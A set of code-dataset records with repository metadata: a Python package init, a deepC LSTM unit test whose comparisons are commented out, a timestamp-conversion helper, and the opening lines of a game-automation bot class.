src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | null | null | null |
src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | null | null | null |
from .pipebuf import set_buf_size
| 17
| 33
| 0.852941
| 6
| 34
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8cc5fc2613538c6f671ea3177beccd93dc7f3b3c
| 22,129
|
py
|
Python
|
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
import common
import deepC.dnnc as dc
import numpy as np
import unittest
import sys
class LSTM_detailedTest(unittest.TestCase):
#@unittest.skip("FAIL")
def test_LSTM_1(self):
"""
input_shape: [7, 6, 8]
weight_shape: [1, 72, 8]
recurrence_weight_shape: [1, 72, 18]
bias_shape: [1, 144]
output_shape: [7, 1, 6, 18]
"""
np_X = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_X.npy')
np_W = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_W.npy')
np_R = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_R.npy')
np_B = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_B.npy')
np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_sequence_lens.npy')
np_initial_h = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_initial_h.npy')
np_initial_c = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_initial_c.npy')
np_P = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_P.npy')
dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# print(dc_sequence_lens)
dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
activation_alpha = [0.4966638953530237, 0.43607014563539637, 0.8097313919008828]
activation_beta = [0.12651506658849576, 0.1647539653231257, 0.04623650102301935]
activations = ['tanh', 'relu', 'sigmoid']
clip = 2.135794928171123
direction = "forward"
hidden_size = 18
input_forget = 1
rtr = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_Y.npy')
dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# for d in dcr:
# print(d)
#
# print("MID")
# print(rtr)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
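# NOTE: with the assertion above commented out, this test only verifies that dc.lstm runs without raising.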
#@unittest.skip("FAIL")
# def test_LSTM_2(self):
# """
# input_shape: [8, 4, 1]
# weight_shape: [2, 64, 1]
# recurrence_weight_shape: [2, 64, 16]
# bias_shape: [2, 128]
# output_shape: [8, 2, 4, 16]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.20332784907676504, 0.22637955219185357, 0.6021193542725863, 0.6168572580474495, 0.40207405192136414, 0.036317260701121845]
# activation_beta = [0.7717703726511062, 0.027305984207814826, 0.8047659241021807, 0.6452577518231254, 0.7319012533727602, 0.25505174775324035]
# activations = ['tanh', 'tanh', 'sigmoid', 'relu', 'sigmoid', 'relu']
# clip = 2.907158875085247
# direction = "bidirectional"
# hidden_size = 16
# input_forget = 10
# rtr = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_3(self):
# """
# input_shape: [8, 1, 4]
# weight_shape: [1, 56, 4]
# recurrence_weight_shape: [1, 56, 14]
# bias_shape: [1, 112]
# output_shape: [8, 1, 1, 14]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.5353786525215217, 0.0047814145847226985, 0.17116077889292602]
# activation_beta = [0.8724323449420001, 0.9207316192126214, 0.7391156087035118]
# activations = ['relu', 'sigmoid', 'tanh']
# clip = 7.5397611403351
# direction = "reverse"
# hidden_size = 14
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_4(self):
# """
# input_shape: [2, 1, 1]
# weight_shape: [2, 72, 1]
# recurrence_weight_shape: [2, 72, 18]
# bias_shape: [2, 144]
# output_shape: [2, 2, 1, 18]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.9860778314893995, 0.12417696210947016, 0.0006744261981547206, 0.24339585920465567, 0.7498252461249489, 0.30754908604622977]
# activation_beta = [0.1603792258866038, 0.1880417110347281, 0.6952466604231525, 0.11767276043277997, 0.61860245840078, 0.6615465711832315]
# activations = ['sigmoid', 'relu', 'sigmoid', 'tanh', 'relu', 'tanh']
# clip = 3.7019881776389996
# direction = "bidirectional"
# hidden_size = 18
# input_forget = 8
# rtr = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_5(self):
# """
# input_shape: [2, 3, 10]
# weight_shape: [2, 20, 10]
# recurrence_weight_shape: [2, 20, 5]
# bias_shape: [2, 40]
# output_shape: [2, 2, 3, 5]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.9958868560901981, 0.5615704868314114, 0.5054884381550756, 0.5125119319409338, 0.18310275479264726, 0.4990119412451889]
# activation_beta = [0.2876466600692591, 0.560778821439632, 0.2632346842213401, 0.13121922832510213, 0.8822817678248556, 0.9880592276419286]
# activations = ['tanh', 'relu', 'tanh', 'sigmoid', 'sigmoid', 'relu']
# clip = 6.117108798702516
# direction = "bidirectional"
# hidden_size = 5
# input_forget = 17
# rtr = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_6(self):
# """
# input_shape: [7, 5, 9]
# weight_shape: [1, 64, 9]
# recurrence_weight_shape: [1, 64, 16]
# bias_shape: [1, 128]
# output_shape: [7, 1, 5, 16]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.1508855746391079, 0.4507448733258578, 0.41656131175216204]
# activation_beta = [0.5657658415464043, 0.21611300965755376, 0.15922967506138452]
# activations = ['tanh', 'relu', 'sigmoid']
# clip = 3.1767036746309287
# direction = "forward"
# hidden_size = 16
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_7(self):
# """
# input_shape: [6, 8, 6]
# weight_shape: [2, 40, 6]
# recurrence_weight_shape: [2, 40, 10]
# bias_shape: [2, 80]
# output_shape: [6, 2, 8, 10]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.28920619362824995, 0.747465052565989, 0.661162342694396, 0.8477376049646675, 0.07881817761441567, 0.16208001287665696]
# activation_beta = [0.7627506699799991, 0.6606114297796492, 0.9585330972395699, 0.5549681443136113, 0.059042596260018065, 0.04648254501072813]
# activations = ['sigmoid', 'sigmoid', 'tanh', 'relu', 'relu', 'tanh']
# clip = 3.879685115272961
# direction = "bidirectional"
# hidden_size = 10
# input_forget = 11
# rtr = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_8(self):
# """
# input_shape: [5, 1, 9]
# weight_shape: [2, 4, 9]
# recurrence_weight_shape: [2, 4, 1]
# bias_shape: [2, 8]
# output_shape: [5, 2, 1, 1]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.7746672952847123, 0.036382870533804956, 0.4848161740062119, 0.9830896771807061, 0.017064708201858125, 0.6242851269185792]
# activation_beta = [0.2517994027716025, 0.28976631245816886, 0.38611683342345127, 0.13080875018242, 0.40170849770653727, 0.956570288835856]
# activations = ['sigmoid', 'relu', 'sigmoid', 'relu', 'tanh', 'tanh']
# clip = 2.72219901402834
# direction = "bidirectional"
# hidden_size = 1
# input_forget = 20
# rtr = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_9(self):
# """
# input_shape: [1, 2, 9]
# weight_shape: [1, 52, 9]
# recurrence_weight_shape: [1, 52, 13]
# bias_shape: [1, 104]
# output_shape: [1, 1, 2, 13]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.08447232888329703, 0.6786879671317316, 0.6558691737892577]
# activation_beta = [0.7615097936520958, 0.5651098460911419, 0.2265325436094976]
# activations = ['sigmoid', 'relu', 'tanh']
# clip = 6.4355391083683635
# direction = "forward"
# hidden_size = 13
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_10(self):
# """
# input_shape: [9, 6, 2]
# weight_shape: [2, 8, 2]
# recurrence_weight_shape: [2, 8, 2]
# bias_shape: [2, 16]
# output_shape: [9, 2, 6, 2]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.5494076090797351, 0.4486022544214028, 0.8555569145519173, 0.36385914141140563, 0.2786060330869964, 0.3709594247211093]
# activation_beta = [0.6841038069275263, 0.12454085979724905, 0.16010194778825715, 0.43645368358634684, 0.2006827543226236, 0.025382308479808713]
# activations = ['relu', 'tanh', 'relu', 'sigmoid', 'sigmoid', 'tanh']
# clip = 7.52494780016543
# direction = "bidirectional"
# hidden_size = 2
# input_forget = 19
# rtr = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
def tearDown(self):
    # unittest ignores tearDown's return value; the string is informational only.
    return "test finished"
if __name__ == '__main__':
unittest.main()
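# Every commented-out case above follows the same golden-file pattern: load the
# saved .npy tensors, wrap them into dc arrays, run dc.lstm, and compare the
# result against the stored Y with loose tolerances. A minimal sketch of that
# pattern, reusing only the dc calls seen above and assuming the suite's
# module-level np/dc imports; results_dir and case_name are hypothetical
# parameters, not part of the original suite.
def check_lstm_against_reference(results_dir, case_name):
    def load(tensor):
        np_arr = np.load('%s/%s/%s_%s.npy' % (results_dir, case_name, case_name, tensor))
        return dc.array(np_arr.flatten().tolist()).reshape(np_arr.shape)

    dc_X, dc_W, dc_R, dc_B = load('X'), load('W'), load('R'), load('B')
    dc_seq, dc_h0, dc_c0, dc_P = (
        load('sequence_lens'), load('initial_h'), load('initial_c'), load('P'))
    expected = np.load('%s/%s/%s_Y.npy' % (results_dir, case_name, case_name))
    result = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_seq, dc_h0, dc_c0, dc_P)
    np.testing.assert_allclose(
        expected.flatten(),
        np.array(result[0].data()).astype(np.float32),
        rtol=1e-3, atol=1e-3)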
| 56.307888
| 151
| 0.696778
| 3,655
| 22,129
| 3.898222
| 0.059097
| 0.106682
| 0.063167
| 0.101067
| 0.750983
| 0.732664
| 0.730769
| 0.729787
| 0.728313
| 0.727049
| 0
| 0.122405
| 0.135749
| 22,129
| 392
| 152
| 56.451531
| 0.622588
| 0.850423
| 0
| 0
| 0
| 0
| 0.164518
| 0.149932
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.138889
| 0.027778
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
50ea26c99c47921997d55ce7ce6bf1c073fe937e
| 191
|
py
|
Python
|
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import datetime
# Converts seconds elapsed since 1 Jan 1970 (the Unix epoch)
# back into a readable local datetime.
def convertback(seconds):
return datetime.datetime.fromtimestamp(seconds)
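# A minimal usage sketch (standard library only): round-trip the current time
# through an epoch timestamp. The printed value shown is illustrative.
if __name__ == '__main__':
    import time
    now_seconds = time.time()
    print(convertback(now_seconds))  # e.g. 2021-06-01 12:00:00.123456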
| 27.285714
| 51
| 0.790576
| 26
| 191
| 5.807692
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.136126
| 191
| 7
| 51
| 27.285714
| 0.884848
| 0.47644
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
50f3775393351d0553bb1135bea70827de70a843
| 42,929
|
py
|
Python
|
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
import likeyoubot_game as lybgame
import likeyoubot_kaiser_scene as lybscene
from likeyoubot_configure import LYBConstant as lybconstant
import time
import sys
import tkinter
from tkinter import ttk
from tkinter import font
import copy
class LYBKaiser(lybgame.LYBGame):
work_list = [
'게임 시작',
'로그인',
